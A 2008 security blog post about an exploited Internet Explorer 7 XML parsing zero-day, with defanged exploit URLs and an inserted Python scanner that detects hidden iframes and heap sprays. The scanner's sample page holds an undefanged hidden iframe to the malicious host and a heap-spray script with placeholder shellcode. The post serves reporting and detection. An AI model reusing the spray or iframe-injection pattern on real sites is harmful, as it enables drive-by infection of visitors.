
December 10th, 2008

IE7 XML parsing zero day exploited in the wild

Posted by Dancho Danchev @ 5:57 pm

Categories: Anti Virus, Arbitrary Code Execution, Botnets, Browsers, Exploit code, Hackers, Malware, Microsoft, Patch Watch, Windows Vista, Zero-day attacks

Tags: Security, Internet Explorer 7, XML, Windows XP, Windows Vista, Dancho Danchev

A couple of hours ago, two working proof-of-concept exploits for the MS Internet Explorer XML Parsing Remote Buffer Overflow were posted at Milw0rm, and international hacking communities quickly caught up and started using them. The second PoC also works on Vista; both exploits were tested on Vista SP1 with Internet Explorer 7.0.6001.18000, on Vista SP0 with Internet Explorer 7.0.6000.16386, and on WinXP SP3 with Internet Explorer 7.0.5730.13.

And if that’s not enough, Microsoft is also investigating a second zero day affecting the WordPad text converter according to an advisory issued yesterday.

Not surprisingly, the IE7 exploit is already in circulation, with the Shadowserver Foundation keeping track of the malicious domains using it, the majority of which remain active. Although in its current form the exploit code is easy to spot through generic detection of potentially malicious shellcode, sampling several of the domains using it reveals that the Chinese hackers behind it are also taking advantage of several other client-side vulnerabilities in order to increase the chances of a successful infection. A typical exploit structure looks like the following:

baidu. bbtu01. cn/c0x.htm
baidu. bbtu01. cn/ie07.htm
baidu. bbtu01. cn/104.htm
baidu. bbtu01. cn/a0s.htm
baidu. bbtu01. cn/c0e.htm
baidu. bbtu01. cn/lzz.htm
baidu. bbtu01. cn/Bf0yy.htm
baidu. bbtu01. cn/rea0l10.htm
baidu. bbtu01. cn/real11.htm

Although the malicious domains are currently only injected into legitimate Chinese sites and forums as iframes, this could easily change, with more legitimate international sites starting to get targeted. What are they after this time? Passwords for popular online games in China.
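As an added illustration (an editor's example, not code from this post, from Shadowserver or from the attackers), the following Python scanner applies the two observations above to a fetched page: the injected iframes are hidden and point at several exploit pages on one host, and the string that carries the shellcode is built with unescape("%u....") plus a string-doubling loop, which is exactly what generic shellcode and heap-spray detection keys on. The sample page is constructed; its host name is the one from the list above written without defanging so the URL parser accepts it, and the %u words are placeholders, not working shellcode. The heuristics and thresholds (at least four %u words, a growth loop to 64 KiB or more, a sled defined as a run where at least half the words repeat) are the editor's assumptions, not anything the post or Shadowserver specifies.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample, not a real capture: a forum page with two hidden iframes
# injected into it, each pointing at a different exploit page on the same host
# named in the post, plus the unescape()-built heap spray that generic shellcode
# detection keys on. The %u words are placeholders, not working shellcode.
SAMPLE_HTML = """<html><body>
<h1>Forum</h1><p>Welcome back.</p>
<iframe src="http://example.com/widget.html" width="300" height="200"></iframe>
<iframe src="http://baidu.bbtu01.cn/ie07.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://baidu.bbtu01.cn/104.htm" style="display:none"></iframe>
<script>
var sc = unescape("%u4141%u4242%u4343%u4444%u4545");
var sled = unescape("%u0c0c%u0c0c%u0c0c%u0c0c");
while (sled.length < 0x100000) sled += sled;
var heap = new Array();
for (var i = 0; i < 200; i++) heap[i] = sled + sc;
</script>
</body></html>"""


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# A run of at least four %uXXXX words inside unescape(): the usual way a sled or
# shellcode string is built for a heap spray (threshold is an assumption).
UNICODE_RUN = re.compile(r"unescape\s*\(\s*['\"]((?:%u[0-9a-fA-F]{4}){4,})['\"]")
# while (s.length < BIG) s += s;  -- the string-doubling loop that fills the heap.
GROW_LOOP = re.compile(r"while\s*\(\s*\w+\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)")


def _dim(value):
    """Parse a width/height attribute such as '0', '0px' or '300'; None if unparseable."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def _is_hidden(attrs):
    """True for iframes the visitor cannot see: zero-sized or hidden by inline style."""
    if HIDDEN_STYLE.search(attrs.get("style", "")):
        return True
    return _dim(attrs.get("width", "")) == 0 or _dim(attrs.get("height", "")) == 0


def scan_page(html):
    """Return a list of (rule, detail) findings for one fetched page."""
    findings = []
    collector = _IframeCollector()
    collector.feed(html)

    hidden_srcs = []
    for attrs in collector.iframes:
        if _is_hidden(attrs):
            hidden_srcs.append(attrs.get("src", ""))
            findings.append(("hidden_iframe", attrs.get("src", "")))

    # Several distinct pages served from one host is the "throw every client-side
    # bug we have at the visitor" pattern the post describes.
    by_host = {}
    for src in hidden_srcs:
        parts = urlsplit(src)
        if parts.netloc:
            by_host.setdefault(parts.netloc, set()).add(parts.path)
    for host, paths in by_host.items():
        if len(paths) > 1:
            findings.append(("multi_exploit_host", f"{host}: {len(paths)} pages"))

    for m in UNICODE_RUN.finditer(html):
        words = [w.lower() for w in re.findall(r"%u([0-9a-fA-F]{4})", m.group(1))]
        # A sled is a short unit repeated; payload words are mostly distinct.
        if len(set(words)) * 2 <= len(words):
            findings.append(("spray_sled", "%u" + words[0]))
        else:
            findings.append(("unicode_payload", f"{len(words)} words"))

    for m in GROW_LOOP.finditer(html):
        literal = m.group(1)
        size = int(literal, 16) if literal.lower().startswith("0x") else int(literal)
        if size >= 0x10000:  # 64 KiB and up: far beyond any benign string builder
            findings.append(("spray_grow_loop", hex(size)))

    return findings


if __name__ == "__main__":
    for rule, detail in scan_page(SAMPLE_HTML):
        print(f"{rule:18} {detail}")
```

Run it as a script to print the findings for the constructed page. Checks this generic catch the samples in circulation today, but nothing stops the attackers from renaming the loop variable, splitting the escape string or building the spray some other way, so treat a hit as a trigger for full analysis of the page rather than as a verdict, and pair it with the domain tracking Shadowserver is already doing.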

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response. He's been an active security blogger since 2007, and maintains a popular security blog.



Talkback (9)

Most recent: "Don't mind.... Loverock. He misses a lot of things because he is in love with Bill Gates." Posted by todbran@... on 12/12/08.

  • Thank goodness for Protected Mode  PB_z | 12/10/08
  • Let's Cut to the Chase  DannyO_0x98 | 12/11/08
  • Protected Mode does not prevent code from running.  ye | 12/11/08
  • Just About to Move On  DannyO_0x98 | 12/12/08
  • yet another reason to keep the UAC enabled  qmlscycrajg | 12/10/08
  • I think i'll take the paranoid approach..  JT82 | 12/11/08
  • RE: IE7 XML parsing zero day exploited in the wild  Loverock Davidson | 12/11/08
  • Did you miss this sentence?  msalzberg | 12/11/08
  • Don't mind....  todbran@... | 12/12/08
